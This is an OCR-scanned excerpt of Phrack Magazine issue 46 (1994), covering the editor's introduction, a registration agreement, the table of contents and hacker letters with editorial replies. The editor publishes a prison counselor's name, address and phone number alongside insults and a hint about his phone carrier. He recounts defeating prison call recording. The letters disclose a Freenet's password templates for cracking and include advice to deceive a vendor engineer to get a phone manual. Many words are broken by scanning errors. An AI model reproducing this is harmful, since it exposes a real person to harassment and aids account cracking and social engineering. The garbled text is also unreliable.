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September 20, 1994 


"La cotorra que chi, no canta" 


Honey, I’m home! Anyway, like the little proverb above indicates, I’ve 
been a very busy man since the last issue. I’ve been denied entry to 

a federal prison in North Carolina (imagine the irony of THAT); I’ve 
been whoring in the Red-Light District of Amsterdam with military 
intelligence officers from England, Spain and the US; estuve chicaito en 
Nuevo Lardeo; I’ve tested wireless networks in Canada; and I’ve been 

on TV a few more times. (No, nimrod, Phrack is not my job...I WORK 

for a living.) 


Needless to say, it has been a chore for me to get Phrack out at all, 
much less only a month or so past my self-imposed quarterly deadlin 

But hell, I love doing this magazine, so here it is. Phrack is the only 
way I can completely thrill and simultaneously piss off so many people 
at once, so I don’t think I’1l stop any time soon. 


Pissing people off. It’s what I like to do, and it would appear that 


I’m quite good at it. I realize that there are several extremely 

vocal erikb-bashers out there. And to them I say, "smooches!" 

Let’s face it, sour grapes make bad whiners. But hey, "As long as they’re 
talking about Erikb, let ’em talk." (Sorry Mr. Ford) 


Besides piecing together this issue, I’ve been working on getting 

the WWW pages together. They still aren’t 100%, but they are getting 
there. By the time I finally get them together, the Phrack 

Web Site should be the ultimate underground resource on the net. 
Check it out: http://freeside.com/phrack.html 


You may be interested in the federal prison remark from the first 
paragraph. I had a meeting at IBM out in Research Triangle Park. I 
figured that this would be an ideal time to go see Co/Dec who still has 
several years of federal time left to serve. Co/Dec is in 
the Federal Correctional Institute at Butner, North Carolina, a short 
30 or so minutes from where I was staying in RTP. 


nyway, I receive the necessary forms from Co/Dec to get on the approved 
isitors list, and sent them back in. After several weeks, Co/Dec said 

hat I still had not been added. My trip was slated for a week away, so 
called his counselor, Wilbert LeMay. Mr. LeMay told me that he never got 
y forms. I then fed-ex’ed a copy (that I luckily had kept). It arrived 

n Friday morning, and I was to arrive on Monday. Mr. LeMay had assured me 
hat it would be no problem to get me added to Co/Dec’s list. 


tOBHaAS, Pp 


When I arrived on Monday, I called the prison to make sure the visit had 
been cleared. Mr. LeMay would not return my calls. In fact, not only 
would he not return any of the 5 or so calls I made, but he didn’t even 
bother to enter my name on the visitor list until the Wednesday after I 
had already left North Carolina. 


I’m sorry, but this man must be a real prick. 


A bit of background on LeMay. First off, according to those on the inside, 
LeMay dislikes white people. He supposedly keeps a picture of slaves 
picking cotton on his desk as a constant reminder of the oppression his 
people were subjected to. But perhaps working in the prison system where 
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you have constant view of the Aryan Brotherhood in action, I’m sure many 
would begin to feel likewise. (Can’t we all just get along?) Secondly, 
LeMay dislikes Co/Dec. He put Co/Dec in solitary confinement for weeks 
because Co/Dec had a DOS MANUAL! A fucking DOS MANUAL! You do not 

put someone in the fucking hole for brushing up on the syntax for xcopy! 
You put them in the hole for inciting a fucking shank war, or for stealing 
food, or for punching a guard. Later, Co/Dec found himself in solitary 
confinement AGAIN because he traded some smokes for telephone parts he was 
going to use to fix a radio. The hole again. Not for weapons and drugs, 
NO! Much worse: wires and a speaker! 


The prison now considers Co/Dec a security risk, and read all OUTGOING 
mail he sends. Not just the regular reading of all incoming mail 
that any inmate would expect. He can’t take any clases, he’s had 
several more days added to his sentence for "bad time served," 

and in addition, all of his phone calls are live monitored and recorded. 
( 

C 

t 

W 


A funny note, during one conversation I found that my touchtones would 
ontrol th quipment they were using to record the call. The equipment 
hey were uSing was improperly connected and gave off a terrible hum 

hen activated. I kept turning off the recording, and the security 
officer kept having to turn it back on.) 


All of this, due to Counselor Wilbert LeMay. Thanks guy. 


If someone can so grossly abuse their power to completely remove th 
dignity of another human being, inmate or otherwise, that person needs 
to face severe disciplinary action. I’m writing the warden. Directory 
Assistance says that Wilbert can be reached at: 


Wilbert LeMay 
701 East E St. 
Butner, NC 27509 
919-575-6375 


Fun fact: Butner is serviced by GTE. 


You know, its pretty odd that as hackers, we probably know a larger number 
of ex-cons and current inmates than most people. 


But anyway, on to Phrack. 
This issue is pretty odd in that "The Man" has consented to write 

a few syllables for us to distribute. Yes, Winn Schwartau submitted 
his unique perspectives of Defcon and HOPE. It’s funny how many people 
left Defcon this year and ran home to find information on HIRF weapons 
after hearing Winn speak. (If you’ve actually built one by now, email 


me.) 


What else? GS1, Pagers, Voice Mail, VisaNet, Area 51, Programs, 
Conferences, and an incomplete university dialup list. (Putting out 
an incomplete list really irritates me, but hell, its taking a LOT 
longer than I expected to get some 1300 dialups without more help. 
AHEM! ) 


Can you dig it? I knew that you could. 


READ THE FOLLOWING 


IMPORTANT REGISTRATION INFORMATION 


Corporate/Institutional/Government: If you are a business, 
institution or government agency, or otherwis mployed by, 
contracted to or providing any consultation relating to computers, 
telecommunications or security of any kind to such an entity, this 
information pertains to you. 
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You are instructed to read this agreement and comply with its 
terms and immediately destroy any copies of this publication 
existing in your possession (electronic or otherwise) until 

such a time as you have fulfilled your registration requirements. 
A form to request registration agreements is provided 

at the end of this file. Cost is $100.00 US per user for 
subscription registration. Cost of multi-user licenses will be 
negotiated on a site-by-site basis. 


Individual User: If you are an individual end user whose use 

is not on behalf of a business, organization or government 
agency, you may read and possess copies of Phrack Magazine 

free of charge. You may also distribute this magazine freely 

to any other such hobbyist or computer service provided for 
Similar hobbyists. If you are unsure of your qualifications 

as an individual user, please contact us as we do not wish to 
withhold Phrack from anyone whose occupations are not in conflict 
with our readership. 


Phrack Magazine corporate/institutional/government agreement 


Notice to users ("Company"): READ THE FOLLOWING LEGAL 
AGREEMENT. Company’s use and/or possession of this Magazine is 
conditioned upon compliance by company with the terms of this 
agreement. Any continued use or possession of this Magazine is 
conditioned upon payment by company of the negotiated fee 
specified in a letter of confirmation from Phrack Magazine. 


This magazine may not be distributed by Company to any 
outside corporation, organization or government agency. This 
agreement authorizes Company to use and possess the number of copies 
described in the confirmation letter from Phrack Magazine and for which 
Company has paid Phrack Magazine the negotiated agreement fee. If 
the confirmation letter from Phrack Magazine indicates that Company’s 
agreement is "Corporate-Wide", this agreement will be deemed to cover 
copies duplicated and distributed by Company for use by any additional 
employees of Company during the Term, at no additional charge. This 
agreement will remain in effect for one year from the date of the 
confirmation letter from Phrack Magazine authorizing such continued use 
or such other period as is stated in the confirmation letter (the "Term"). 
If Company does not obtain a confirmation letter and pay the applicable 
agreement fee, Company is in violation of applicable US Copyright laws. 


This Magazine is protected by United States copyright laws and 
international treaty provisions. Company acknowledges that no title to 
the intellectual property in the Magazine is transferred to Company. 
Company further acknowledges that full ownership rights to the Magazine 
will remain the exclusive property of Phrack Magazine and Company will 
not acquire any rights to the Magazine except as expressly set 
forth in this agreement. Company agrees that any copies of the 
Magazine made by Company will contain the same proprietary 
notices which appear in this document. 


In the event of invalidity of any provision of this agreement, 
the parties agree that such invalidity shall not affect the validity 
of the remaining portions of this agreement. 


In no event shall Phrack Magazine be liable for consequential, incidental 


or indirect damages of any kind arising out of the delivery, performance or 
use of the information contained within the copy of this magazine, even 

if Phrack Magazine has been advised of the possibility of such damages. 

In no event will Phrack Magazine’s liability for any claim, whether in 
contract, tort, or any other theory of liability, xceed the agreement f 
paid by Company. 


This Agreement will be governed by the laws of the State of Texas 
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as they are applied to agreements to be entered into and to be performed 
entirely within Texas. The United Nations Convention on Contracts for 
the International Sale of Goods is specifically disclaimed. 


This Agreement together with any Phrack Magazine 
confirmation letter constitute th ntire agreement between 
Company and Phrack Magazine which supersedes any prior agreement, 
including any prior agreement from Phrack Magazine, or understanding, 
whether written or oral, relating to the subject matter of this 
Agreement. The terms and conditions of this Agreement shall 
apply to all orders submitted to Phrack Magazine and shall supersede any 
different or additional terms on purchase orders from Company. 


REGISTRATION INFORMATION REQUEST FORM 


We have approximately users. 


Enclosed is $ 
We desire Phrack Magazine distributed by (Choose one): 
Electronic Mail: 


Hard Copy: 
Diskette: (Include size & computer format) 


Name: Dept: 


Company: 


Address: 


City/State/Province: 


Country/Postal Code: 


Telephone: Fax: 


Send to: 


Phrack Magazine 
603 W. 13th #1A-278 
Austin, TX 78701 


Enjoy the magazine. It is for and by the hacking community. Period. 


Editor-In-Chief : Erik Bloodaxe (aka Chris Goggans) 
3L33t : Ice-9 (for helping me get this done!) 
Rad Band : Green Day 


News : Datastream Cowboy 
Photography : The Man 
Prison Consultant : Co / Dec 


The Young Girl : Jane March 
Motor Trend’s Car 
of the Year : The 2600 Van 
Dickhead of the Month : Wilbert LeMay at FCI Butner 
Thanks To : Szechuan Death, Carl Corey, The Shining, Dcypher 
Hitman Italy, Herd Beast, Dr. Delam, Maldoror, 
The Red Skull, PsychoSpy, Seven Up, Erudite, Ice Jey 
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Special Thanks To : Winn Schwartau 


Phrack Magazine V. 5, #46, September 20, 1994. ISSN 1068-1035 
Contents Copyright (C) 1994 Phrack Magazine, all rights reserved. 
Nothing may be reproduced in whole or in part without written 
permission of the Editor-In-Chief. Phrack Magazine is made available 
quarterly to the amateur computer hobbyist free of charge. Any 
corporate, government, legal, or otherwise commercial usage or 
possession (electronic or otherwise) is strictly prohibited without 
prior registration, and is in violation of applicable US Copyright laws. 
To subscribe, send email to phrack@well.sf.ca.us and ask to be added to 
the list. 
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603 W. 13th #1A-278 
Austin, TX 78701 
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Phrack Mailing Address) 
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freeside.com (Phrack FTP Site) 


/pub/phrack 


http://freeside.com/phrack.html (Phrack WWW Home Page) 


U 


phrack@well.sf.ca.us (Phrack E-mail Address) 


or phrackmag on America Online 


Submissions to the above email address may be encrypted 


with the following key : (Not that we use PGP or encourage its 
use or anything. Heavens no. That would be politically-incorrect. 
Maybe someon lse is decrypting our mail for us on another machine 


that isn’t used for Phrack publication. Yeah, that’s it. :) +) 


** ENCRYPTED SUBSCRIPTION REQUESTS WILL BE IGNORED ** 


Phrack goes out plaintext...you certainly can subscribe in plaintext. 


einer BEGIN PGP PUBLIC KEY BLOCK--—---— 
Version: 2.3a 


mQCNAiuIr00AAAEEAMPGAJ+t zwSTQBjJ1Iz/1IXs155E1 9QW8EPyIcd7NjQ98CRgGJNy 
1tY43xMKv 7HveHKqJC 9KqpUYWwvEBLg1Z30H3g jbChXn+suUl1 8K6V1xRvxgy21qi 
a4/qpCMxM9acukKOWYMWA0 zg+xf 3WShwauFWF 7bt qk 7Go jn1lY1bCD+Ag5Uf1AAUR 
tCZQaHJhY2sgIWFnYXppbmUgPHBocmF ja0B3ZWxsLnNmLmNhLnvzPg== 


=q2KB 
Sas = END PGP PUBLIC KEY BLOCK----- 

-= Phrack 46 =- 

Table Of Contents 

1. Introduction by The Editor 17 K 
2. Phrack Loopback / Editorial 52 K 
3. Line Noise 61K 
4. Line Noise 56 K 
5. Phrack Prophile on Minor Threat 12 K 
6. Paid Advertisement 62 K 
7. Paid Advertisement (cont) 45 K 
8. The Wonderful World of Pagers by Erik Bloodaxe 24 K 
9. Legal Info by Szechuan Death 13 K 
10. A Guide to Porno Boxes by Carl Corey 13:K 
11. Unix Hacking - Tools of the Trade by The Shining 42 K 
12. The fingerd Trojan Horse by Hitman Italy 32 K 
13. The Phrack University Dialup List 12 K 
14. A Little About Dialcom by Herd Beast 29 K 
15. VisaNet Operations Part I by Ice Jey 50 K 
16. VisaNet Operations Part II by Ice Jey 44 K 
17. Gettin’ Down '’N Dirty Wit Da GS/1 by Maldoror & Dr. Delam 25 K 
18. Startalk by The Red Skull 21K 
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19. Cyber Christ Meets Lady Luck Part I by Winn Schwartau 45 K 
20. Cyber Christ Meets Lady Luck Part II by Winn Schwartau 42 K 
21. The Groom Lake Desert Rat by PsychoSpy 44 Kk 
22. HOPE by Erik Bloodaxe Diy -K 
23. Cyber Christ Bites the Big Apple by Winn Schwartau 60 K 
24. The ABCs of Better Hotel Staying by Seven Up 12 K 
25. AT&T Definity System 75/85 by Erudite 13 K 
26. Keytrap vl.0 Keyboard Key Logger by Dcypher 35 K 
27. International Scenes by Various Sources 44 K 
28. Phrack World News by Datastream Cowboy 38 K 

Total: 996 K 


"Most hackers would have sold out their mother." 
Justin Tanner Peterson 


"Treason is loved of many but the traitor hated of all." 
Robert Greene (1552-1592) 


"They smile in your face, but all the while they want to take your place." 
The O’ Jays 
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Phrack Loopback 


I’d like to write you about my friends cat. His name is ’Cid. Cid 

loves reading, in fact he’1l read just about anything, from the labels on 
his cat food tins to the instructions on the "real" use of his Grafix 
(incense burner :) ). Well one take, ’Cid (or was it me) was indulging 
in the reason he got his moniker and mentioned that he’d like to receive 
Phrack. Well i told him he could just subscribe to it and then he went 
into a real sob story about how he doesn’t have net access. So asa 
favor to ’Cid (who really does exist, and really has tripped out on brain 
blotters) i’d like to subscribe to Phrack. 


[You my want to take note that Phrack can also be printed on paper. 
Now, that’s a lot of blotter. 


You’ve got your subscription, now go watch some anime. ] 


I recently got a new job and shortly after beginning working there, they 
decided to retool and reorganize a bit for better productivity. 


While we were going through some old boxes and stuff, I came across a 
little black box with the words "Demon Dialer" molded into the front of 
it, it even had the (functional!) 20volt power supply. 


Needless to say I was pretty happy with my find. I asked if I could have 


it and since no on lse there seemed to know what to make of it, mine it 
was! 
My only problem now... I’ve played around with it, and it seems to do a 


lot more than what I originally thought, but the fact of the matter is.. 
I really haven’t the foggiest idea of how to get it to REALLY work for me. 


If anyone has any information, or better still, actual documentation for 
a Telephonics Inc, Demon Dialer... I’d really appreciate passing it on to me. 
Also, something rater strange. The phone cable attached to it hada 


normal looking 4-wire connector on one end, but the other was split to 
have RJ jacks, one with the yellow-black combo and one with the 
red-green. The split ends (sorry :)) were plugged into the WALL and 
PHONE jacks on the demon dialer. The purpose for this perplexes me sinc 
one’s supposed to be input and one’s supposed to be a passthrough for the 
phone to be plugged into. 


Anyway, any info would be nice. Thanks guys. 


[Telephonics was one of those odd telco device manufacturers back in the 
80’s. They made the demon dialer (a speed dialing device), a 

two-line conference box, a divertor, etc. Essentially, they provided 
in hardware what the telco’s were beginning to roll-out in software. 


I think the line splitter you have was merely plugged into those 

two jacks for storage purposes. What that probably was for was to 
allow two lines to use the Demon Dialer. It was probably just reversed 
when your company boxed it so it wouldn’t get lost. 


I’m not sure if Telephonics is still in business. A good place to 
start looking for info would be comp.dcom.telecom or alt.dcom.telecom. 
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Another good place may be Hello Direct (800-HI-HELLO). They used to 
do have Telephonics equipment available for mail-order. ] 


I saw an ad for a book called "Secrets of a SuperHacker" by Knightmare. 
Supposedly it intersperses tales of his exploits with code and examples. 
I have big doubts, but have you heard anything good/bad about it? 


[Your doubts are well founded. I got an advance copy of that book. 
Let’s put it this way: does any book that contains over a dozen pages 
of "common passwords" sound like ground breaking material? 


This book is so like "Out of the Inner Circle" that I almost wanted 
to believe Knightmare (Dennis Fiery) was really yet another 

alias for Bill Landreth. Imagine "Out of the Inner Circle" with 
about a hundred or more extra pages of adjectives and examples that 
may have been useful years back. 


The Knightmare I knew, Tom in 602, whose bust by Gail Thackeray 
gave law enforcement a big buffer of the Black Ice Private BBS 

and help spark the infamous LOD Hacker Crackdown, certainly didn’t 
have anything to do with this. In fact, the book has a kind of 
snide tone to it and is so clueless, that leads me to believe it 
may have been written by a cop or security type person looking to 
make a quick buck. 


As far as source code, well, there is a sample basic program that 
tries to emulate a university login. 


If you want a good book, go buy "Firewalls and Internet Security" by 
Cheswick and Bellovin.] 


Hey Chris, 


I’m sure you are under a constant avalanche of requests for certain files, 
so I might as well add to your frustration <grin>. I know of a program 
that supposedly tracks cellular phone frequencies and displays them on 

a cellmap. However, I don’t know the name of the program or (obviously) 


where to find this little gem. I was wondering if you could possibly 
enlighten me on a way to acquire a program similar to the one I have 
described. I have developed some other methods of tracking locations 
of cellular calls. However my methods rely on a database and manually 


mapping cellular phones, this method is strictly low tech. Of course 
this would be for experimental use only, therefore it would not be used 
to actually track actual, restricted, radio spectrum signals. I wouldn’t 
want the aether Gestapo pummeling our heads and necks. 


[I don’t know of anything that plots frequencies on a cellmap. How would 
you know the actual locations of cells for whatever city you may 
be in to plot them accurately? 


There are a number of programs written to listen to forward channel messages 
and tell you when a call is going to jump to another channel. The cellular 
telephon xperimenter’s kit from Network Wizards has a lot of nice 

C source that will let you write your own programs that work with their 

i 

C 

a 


nterface to the OKI 900. I suppose you could get the FCC database 

D-ROM for your state and make note of longitude and latitude of cell sites 
nd make your own database for your city, and then make a truly 

visual representation of a cellmap and watch calls move from cell to cell. 
But I don’t think there is such a thing floating around the underground 

at present. 


Of course the carriers have this ability, and are more than happy to make 
it available to Law Enforcement (without a warrant mind you). Hi OJ! 
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email Mark Lottor mw@nw.com for more info about the CT 


eal 
XN 
mw 


I saw this in a HoHoCon ad: 


Top Ten Nark List 
Traxxter 

Scott Chasin 
Chris Goggans 
Aget Steal 
Dale Drrew 
Cli ff Stoll 
[blank] 

Julio Fernandez 
Scanman 
Cori Braun 


CDOMAATNAUABRWNE 


fay 


What did Chris Goggans do? Isn’t he Erik Bloodaxe, the publisher of 
Phrack? I sincerely doubt that the feds would have someone 
working for them that puts out a publication like Phrack. It would 


be way too much of an embarrassment for them. I wrote to the 
editor of Phrack when I read that Agent Steal said that the publisher 
of Phrack was a Fed —- IN PHRACK no less. He said it was a stupid rumor. 


Is there anything to support this fact? And why is there now some manhunt for 
Agent Steal (at CFP the FBI was checking legs) if Steal was admittedly 

their employee? The whole thing is very confusing to me. Please explain. 

If Goggans isn’t Bloodaxe then he’d Knight Lightning (this just came to me). 
Nevertheless, what’s the story here? 


[First off, I think you take things a little too seriously. If you are on 
a nark hunt, worry about your associates, not people you obviously 


don’t even know. Chris Goggans (ME) is most positively Erik Bloodaxe. 
Thanks for remembering. 


Agent Steal was involved with the FBI. This is a fact. 

In his case, h ven appeared to have some kind of immunity while trying 
to gather information on other hackers like Mitnik and Poulsen. This 
immunity is under scrutiny by the Bureau’s own Internal Affairs (or so the 
new rumors go), Since Steal was pulling a fast one and committing crimes 
the Bureau didn’t know about to get some quick cash while he set up his 
friends. 


My story is a bit more convoluted. You can sum it up by saying, if you 
interfere with my businesses, I’1l try my best to track you down and turn 
you in. I guess I ama nark.] 


I read in the last Phrack (45) that you wanted someone to write a few 
words on scrambling systems. Give me a rough outline of what you want 
and I’1ll see if I can help :-) Basically I wrote the Black Book 
(European Scrambling Systems 1,2,3,4,5 and World Satellite TV & 
Scrambling Methods) and also edit Hack Watch News & Syndicated 
HackWatch. They all deal with scrambling system hacks as opposed to 
computer hacking & phreaking. (Things are a bit iffy here as regards 
phreaking as all calls are logged but the eprom phone cards are easy 
to hack) Oh yeah and another claim to fame ;-) if you can call it 
that, is that I was quoted in an article on satellite piracy in 
"Wired" August issue. 


This Hawkwind character that you had an article from in Phrack43 
sounds like a *real* hacker indeed :-> Actually there is an elite in 
Ireland but it is mainly concerned with satellite hacking and that 
Hawkwind character is obviously just a JAFA (Irish hacker expression 
—- Just Another Fu**ing Amateur). Most of the advanced telco stuff is 
tested in the south of the country as Dublin is not really that 
important in terms of comms - most of the Atlantic path satellite 
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comms gear and brains are on the south coast :-) 


Actually the Hawkwind article really pissed off some people here in 
Ireland there were a few questions asked on my own bbs (Special 
Projects +353-51-50143) about this character. I am not even sure if 
the character is a real hacker or just a wannab there were no 
responses from any of his addresses. SP is sort of like the neutral 
territory for satellite and cable hacking information in Europe 
though there are a few US callers. With the way things are going with 
your new DBS DirecTv system in the US, it looks like the European 
Ss 
( 
d 


atellite hackers are going to be supplying a lot of information 
DirecTv’s security overlay was developed by News Datacom - the 
evelopers of the totally hacked VideoCrypt system here in Europe). 


There telco here uses eprom phone cards. These ar xtremely easy to 
hack (well most real hackers in .IE work on breaking satellite 
scrambling systems that use smart cards) as they are only serial 
eprom. 


Regards 


[About the satellite information: YES! Write the biggest, best 
article the whole fucking hacker world has ever seen about 

every aspect of satellite tv!! Personally, I’m more interested in 
that than anything else anyone could possibly write (seeing as how 
I’m about to buy a dish for both C and Ku). 


About Hawkwind’s article on hacking in Ireland: If I were to write 
an article about hacking in America, it would be entirely different 
than anyone else in America would write. A country is a big place. 
Just because someon lse’s hacking experience is different than 
your own, it’s no reason to discredit them. However, if your 
exposure to the scene in Ireland is so completely different than 
Hawkwind’s, I would LOVE to print it as well.] 


Gl Pp 


The Columbus Freenet uses a password generating routine that takes the 
first and last initial of the user’s real name, and inserts it into a randomly 


chosen template. Some of the templates ar 

E (£) www5 (1) 

(£) 22ww5 (1) where f and 1 are first and last initials 

(£) 2ww97 (1) 

(£) 2ww95 (1) 

and so on. There are not too many of these templates, I guess maybe 50. 


I imagine most people go in and change their password right away, but 
then again that’s what a prudent person would do (so they probably don’t). 


Columbus 2600 meetings: 


Fungal Mutoid-sysop of The KrackBaby BBS (614-326-3933) organized the 
first 2600 meetings in Columbus, unfortunately hardly anyone shows up... 
I don’t know why HP is so dead in Central Ohio, but fear and paranoia 
run rampant. 

That’s all for now...keep up with the good work! 


R.U.Serius?! 


[Hmmm...templates are always a bad thing. All one has to do is get the 
program that generates them, and viola, you’ve got a pre-made dict file 
for your crack program. Not very smart on the part of the Freenet, 

but hacking a Freenet, is like kicking a puppy. 


I hope more people go to your 2600 meetings. The ones here in Austin 
kinda died out too. Maybe our cities are just lame.] 
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Gl 


A complaint: That piece about McDonald’s in Phrack 45 was, in a word, LAME. 
Surely Phrack can do better. Maliciousness for its own sake isn’t very 
interesting and frankly the article didn’t have any ideas that a bored 
13-year-old couldn’t have thought up--probably written by one. 


That aside, I found some good stuff in there. Some of it was old news, 

but Phrack serves an archival purpose too, so that was ok. On a more 
personal note, I could really relate to your account of HoHoCon--not that 

I was there, just that I have started to feel old lately even though I don’t 
turn 25 for another 2 days :) Sometimes I feel myself saying things like 
"Why, sonny, when I was your age the Apple II was king..." 


Keep up the good work, and don’t let the lamers get you down. 


[Thanks for the letter. I personally thought the McDonald’s file was 

a laugh riot. Even if it was juvenile and moronic, I wouldn’t expect 
anyone to analyze it and go through with anything it contained. It was 
just for fun. Lighten up :) 


I am glad to see that at least someone else recognizes that Phrack 

is attempting to serve as an archive of our subculture, rather than just 
a collection of technical info that will be outdated overnight, or a 
buglist that will be rendered mostly unusable within hours of release. 
There is so much going on within the community, and it is becoming such a 
spectacle in the popular media, that in 20 years, we can all go back and 
look at Phrack and remember the people, places, and meetings that 

changed the face of the net. 


Or maybe I’m just terribly lame, and either 1) refuse to put in the 
good stuff, 2) don’t have access to the good stuff, 3) exist only asa 
puppet agent of The Man, or 4) Don’t know nothin’ ’bout Telco! 

But you know what they say about opinions. ] 


Fh Fh 


I have a few comments on your editorial in Phrack 44 (on information 
wants to be free). Thanks for voicing an opinion that is shared by many 
of us. I am glad to see a public figure in the CuG with nutz enuff to 
actually come out and make such a statement and mean it. 

Again, thanks. 


Now on the subject of hacking as a whole. Is it just me, or are the number 
of losers on the increase? There have always been those who would try 

and apply these skills to ripoff scams and system trashing but now that 
seems to be the sole intent of many of the "hackers" I come into contact 
with. What ever happened to hacking to learn more about the system. To 
really hack a system (be it phone, computer), is a test of skill and 
determination, and upon success you walk away with a greater understanding 
of the machine and its software. Hacking is more than just knowing how 

to run crack on a filched password file, or using some exploitation 
scripts picked up on IRC, it is a quest for knowledge and gaining 
superiority over a system by use of great skill acquired by a deliberate 
effort. Once was a time when things like toll fraud (I do miss blue 
boxes) were a means to an end, now they seem to be the end in itself. 


Also, I am researching info on OSI comsec procedures and have found some 
really interesting goodies, if you are interested in publishing 
my piece when completed, let me know.. 


[ (NOTE: This came from a .mil) 
Man, I’m glad to see that people in the armed forces still have minds 
of their own. Not many people would express such a thing openly. 


Yes, the destructive/profit-motivated trends of many of the hackers of 
today are pretty sad. But you have to realize, as the technology 
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becomes more and more like consumer electronics, rather than the 


traditional mold of computer as scientific research tool, an entirely 
different market segment will be exposed to it and use the technology 


for less than scrupulous means. 


to any model of system known to man by asking. I realize that 
there are many who cannot accomplish such a thing, but with the 
proliferation of public access sites, almost everyone can afford 


Even the act of hacking itself. Today, I can basically gain access 


access to the net to explore and learn. The point comes down to this: 
if you have an account on a Sun, why do you need an account on a Sun 

at Boeing, unless you either 1) want to sell the cad files of the 777 to 
Airbus or McDonnell-Douglas 2) want to get financial information to 

make a killing on Wall Street, or 3) just want to have an ego boost 


and say "I OWN BOEING!" 


Personally, I can understand the ego boost aspect, but I’ve decided that 


I’d much rather get paid by a company like Boeing to hack for them 
than against them. I don’t want to sell anyone’s info, so hacking 


into any company is basically useless to me, unless they are paying me 


to look for potential weaknesses. 


Granted, it’s not an easy market to get into, but it’s a goal to 
shoot for. 


And for those who find it impossible to quit due to fear of losing 
their edge, check out my editorial in this issue for a possible 
solution. ] 


I am looking for a Macintosh app that does the same thing as an app 
called "Demon Dial" that has been lost in the annals of software 


history due to the fact that some people (sysops) question whether it 
is illegal software (it dials up a series of phone #’s looking for data 
connections). Do you know where I could find an application for the Mac 


that does this simple function? 


[We had a guy ask in an earlier issue for Macintosh hacking/phreaking 


apps. Noone responded. Hell, I know SOMEONE has to use a Mac 
out there. Are you Mac-weenies all embarrassed to speak up? 


Hell, uuencode and email me your aps, and I’1l1 put them up for 
ftp! Help out your poor fellow Macintosh users. I certainly 
would if I could, but the thought of touching a Mac gives me the 
chills.] 


Have you ever heard of being denied access to your own cell phone? 


IT am currently in the process of buying a cell phone and was informed 


that I COULD NOT have the programming guide of the security code 
they enter to program my phone. In my opinion the key word is "MY.' 


iv 


If I get a digital security system for my house you better damn well 
figure I will have the security codes for that. The phone was a Motorola 
flip phone. I called Motorola and explained how displeased I was with 


this company and they said they could not interfere with a reps. pol 


licy. 


When I was selling car phone we kept the programming guide unless they 


asked for it. I demanded it and they laughed in my face. Who said 
"the customer is always right" anyway? 


Thanks, any info is greatly appreciated. By the way, you wouldn’t 
happen to have the CN/A number for 815 would you? Also, any ANAC 
would be very helpful. 


[Well, I hate to say it, but you got typical service from your 
cellular agent. kLet’s face it, these sales reps probably knew 
about as much about that programming manual as I do nuclear 
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physics: "Its confusing, but if you understand it, you can fuck 
things up." 


I am surprised that Motorola wouldn’t sell you the book though. 

Motorola will sell anybody anything. You probably called the wrong 
place. Moto is so huge they’ve got multiple groups working on somewhat 
Similar technologies with absolutely no communication between the groups. 
Sometimes they are in different countries, but sometimes they are in the 
same city! I would suggest you call a local FAE (Field Applications 
Engineer) 
and get them to get the book for you. Make up some story about 

working on some computer controlled application with the phone, and that 
you need any and all documentation on the phone. They’ll do it. Money 
is money. 


As far as the 815 CNA, hell, just call the business office. I haven’t 
called a CNA in years, only the business office. They are nice peopl 
And no PINs. 


815 ANAC: ok guys, someone must have one...email it! 


"The customer is always right" wasn’t in Bartlett’s or Columbia’s 
books of famous quotations. I guess that phrase has been written out of out 
history. So, from now on you aren’t always right, I guess. ] 


Dear Phrack: 


We want you! 


We want you to be a part of our cutting edge documentary that is traversing 
across the "NEW EDGE" of computers, culture, and chaos. 


Working in conjunction with Douglas Rushkoff, the best selling author of 


"CYBERIA," we are currently gathering together the leaders of this 
technological and cultural revolution. This is not a documentary in the 
traditional sense of the word. It is more of an exploration, a journey, a 


unique vision of the world as seen through the eyes of those who live on the 
bleeding edge; where technology, art, science, music, pleasure, and new 
thoughts collide. A place people like you and me like to call home. 


"New Edge" will deliver a slice of creativity, insanity, and infallibility, 
and feed those who are hungry for more than what Main Street USA has to 


offer. This project will detonate across the US and around the world. It 
will become the who’s who of the new frontier and you belong on it’s 
illustrious list of futurians. Please look over th nclosed press releas 


description of the project. 


Phrack has long been the ultimate source for hack/phreak info, and helped to 
push the limits of free speech and information. The role that Phrack has 
played in the Steve Jackson Games Case set an important precedent for 
CyberLaw. We will also be interviewing several people from the EFF. 


Please call me ASAP to schedule an interview for "New Edge", or send me 
E-Mail. 


Sincerely, 


Todd LeValley 

Producer, N E W EDGE 
(310) 545-8138 Tel/Fax 
belief@eworld.com 
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Labyrinth Media Ltd. - European reality-based documentary distributor 


The Audience 


New Edge is aimed at both the technophiles and technophobes alike. While the 
show will feature very complex and sophisticated topics, the discussions will 
be structured to appeal to both those who do and do not have the technical 
framework that underlines the cyberian movement. The show’s content and 
style will make it readily available to the MTV and Generation X demographic 
groups as well as executives who want to stay on top of the latest 
technological advances. Individuals who read Mondo 2000 and Wired magazine 
will also naturally latch on to this electronic 

presentation of their favorite topics. 


The Guides 


Mike Goedeck Director/Graphic Designer 

Mike was the Writer/Director/Cinematographer for the Interplay CD-ROM game 
entitled Sim City. Acting as graphic designer for the Voyager Co.- Criterion 
Laser Disc Division his work is featured on titles such as: Akira, DEVO-The 
Truth About De-Evolution, The Adventures of Baron Munchausen, and Spartacus. 
Most recently he collaborated with Los Angeles Video Artist Art Nomura on a 
video installation piece entitled Digital Mandala. The piece was edited, 
composited , and mastered to Laser Disc using an Apple Macintosh Computer and 
off-the-shelf software. The installation is scheduled to tour museums and 
art galleries across the United States and Europe. While attending 
Cinema/Television Graduate School at the University of Southern California, 
Mike directed the award winning documentary short Rhythm, which celebrates 
various musical cultures. 


Todd LeValley —- Producer/Graphic Designer 
Todd is the Producer/Director of CyberCulture: Visions From The New Edge, a 
documentary that introduces the electronic underground. This project has 
been warmly received at numerous "Cyber Festivals" around the country, as 
well as at the Director’s Guild Of America, and is currently being 
distributed by FringeWare Inc. Todd’s commercial experience includes being 
the in-house graphic designer for Barbour/Langley Productions designing, 
compositing, and producing the graphic packages for several 20th Century Fox 
Television pilots and The Sci-Fi Trader for the USA Network/Sci-Fi Channel. 
Todd is a graduate of the Cinema/Television program at Loyola Marymount 
University. 


Jeff Runyan - Cinematographer/Editor 
Jeff received an MFA from the University of Southern California’s Graduate 
School of Cinema/Television with an emphasis in cinematography and editing. 
He studied cinematography under the guidance of Woody Omens, ASC. and Earl 
Rath, ASC., and editing with Edward Dmytryk. Jeff was the cinematographer on 
the award wining documentary Rhythm. He has recently completed shooting and 
editing a documentary on Academy Award winning Cinematographer Conrad Hall 
for the ASC and has just finished directing a short film for USC 
Teleproductions. 


Douglas Rushkoff —- Cyber Consultant/Author 

Douglas is the author of the best selling Harper Collins San Francisco novel, 
Cyberia. He spent two years of his life living among the key players in the 
cyber universe. Douglas knows the New Edge well and is providing us with the 
